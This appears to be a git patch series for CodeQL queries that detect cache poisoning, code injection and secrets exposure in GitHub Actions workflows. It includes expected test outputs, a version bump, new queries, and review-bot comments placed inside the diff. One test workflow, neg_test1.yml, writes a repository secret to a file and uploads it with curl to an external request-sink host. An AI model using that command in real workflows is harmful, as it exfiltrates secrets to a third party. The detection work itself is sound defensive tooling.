@@ -1,20 +0,0 @@ -edges -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | -nodes -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | -subpaths -#select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. 
| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | 
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref deleted file mode 100644 index cd1a90049a64..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoningByCodeInjection.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected new file mode 100644 index 000000000000..d9f659cbcc38 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected 
@@ -0,0 +1,11 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | +nodes +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref new file mode 100644 index 000000000000..8ac48aad93e0 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaCodeInjection.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected new file mode 100644 index 000000000000..8bd69d8f245a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -0,0 +1,48 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: 
cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| 
.github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref new file mode 100644 index 000000000000..9d1910990fc0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaDirectCache.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected new file mode 100644 index 000000000000..a515bd87334f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -0,0 +1,49 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: 
cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| 
.github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref new file mode 100644 index 000000000000..89db21d70f59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaPoisonableStep.ql + From 9f79e51e89f29b550154143b7583214387ad0bd8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 6 Aug 2024 12:46:28 +0200
Subject: [PATCH 457/707] Bump qlpack versions

---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 1c4415a305de..31270d399723 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.31
+version: 0.1.32
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 9b49717942b5..99e9fac00a40 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.31
+version: 0.1.32
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript

From 6842babd163be86495550d0a29fad704a9484d1f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 23:08:52 +0200 Subject: [PATCH 458/707] feat(query): New queries for incorrect secrets handling ExcessiveSecretsExposure: Reports when all secrets are passed to the workflow runner since that violates the principle of least privilege. UnmaskedSecretExposure: Reports when secrets are derived from a JSON secret since they won't get masked by the workflow runner --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 +-- .../CWE-312/ExcessiveSecretsExposure.ql | 23 +++++++++++++++++ .../CWE-312/UnmaskedSecretExposure.ql | 19 ++++++++++++++ .../CWE-312/.github/workflows/neg_test1.yml | 19 ++++++++++++++ .../CWE-312/.github/workflows/test1.yml | 25 +++++++++++++++++++ .../CWE-312/ExcessiveSecretsExposure.expected | 3 +++ .../CWE-312/ExcessiveSecretsExposure.qlref | 2 ++ .../CWE-312/UnmaskedSecretExposure.expected | 2 ++ .../CWE-312/UnmaskedSecretExposure.qlref | 2 ++ 9 files changed, 97 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.ql create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5bb94ba8a68c..d9738cb74ad8 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -1288,9 +1288,9 @@ string getAToJsonReferenceExpression(string s, int offset) {
 // not just the last (greedy match) or first (reluctant match).
 result =
 s.trim()
- .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*",
+ .regexpFind("(?i)tojson\\(\\s*[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*",
 _, offset)
- .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*",
+ .regexpCapture("(?i)tojson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*",
 1)
 }
 
diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql
new file mode 100644
index 000000000000..c1d22e3a1811
--- /dev/null
+++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql
@@ -0,0 +1,23 @@
+/**
+ * @name Excessive Secrets Exposure
+ * @description All organization and repository secrets are passed to the workflow runner.
+ * @kind problem
+ * @problem.severity recommendation
+ * @id actions/excessive-secrets-exposure
+ * @tags actions
+ * security
+ * external/cwe/cwe-312
+ */
+
+import actions
+import codeql.actions.ast.internal.Ast
+
+from Expression expr
+where
+ getAToJsonReferenceExpression(expr.getExpression(), _).matches("secrets%")
+ or
+ expr.getExpression().matches("secrets[%") and
+ not expr.getExpression().matches("secrets[\"%") and
+ not expr.getExpression().matches("secrets['%")
+select expr, "All organization and repository secrets are passed to the workflow runner in $@",
+ expr, expr.getExpression()
diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql
new file mode 100644
index 000000000000..961af6f267be
--- /dev/null
+++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql
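Review bot: The added `\\s*` in both the regexpFind and regexpCapture patterns only tolerates whitespace after the opening parenthesis; the character class before `\\)` contains no space, so `toJSON( secrets )` with whitespace before the closing parenthesis still matches neither pattern and the reference is dropped. Mirror the change on the closing side, i.e. `\\)` → `\\s*\\)` in both patterns, so the two ends are handled symmetrically. The body of getAToJsonReferenceExpression begins above the hunk.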
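Review bot: The first disjunct of the `where` clause, `getAToJsonReferenceExpression(expr.getExpression(), _).matches("secrets%")`, is a prefix match, so `toJSON(secrets.TOKEN)` or `toJSON(secrets['TOKEN'])` — which serialize a single secret — are reported with the "All organization and repository secrets" message. Since the helper returns the inner reference, an equality test is what the query means: `getAToJsonReferenceExpression(expr.getExpression(), _).toLowerCase() = "secrets"` (the helper's regex is case-insensitive, so the captured text may not be lower case). The test workflow added in this commit only exercises `toJSON(secrets)`, so the expected output does not pin this; a `neg_` case with `toJSON(secrets.TOKEN)` would.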
@@ -0,0 +1,19 @@
+/**
+ * @name Unmasked Secret Exposure
+ * @description Secrets derived from other secrets are not masked by the workflow runner.
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/unmasked-secret-exposure
+ * @tags actions
+ * security
+ * external/cwe/cwe-312
+ */
+
+import actions
+
+from Expression expr
+where expr.getExpression().regexpMatch("(?i).*fromjson\\(secrets\\..*\\)\\..*")
+select expr, "An unmasked secret derived from another secret may be exposed in $@", expr,
+ expr.getExpression()
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
new file mode 100644
index 000000000000..80f98bd57afc
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
@@ -0,0 +1,19 @@
+name: secrets
+on:
+ workflow_dispatch:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ secrets.TOKEN }}' > secrets.txt
+ curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com
+ - env:
+ A_SECRET: ${{ secrets.TOKEN }}
+ run: echo "$A_SECRET"
+ - env:
+ A_SECRET: ${{ secrets['TOKEN'] }}
+ run: echo "$A_SECRET"
+ - env:
+ A_SECRET: ${{ secrets["TOKEN"] }}
+ run: echo "$A_SECRET"
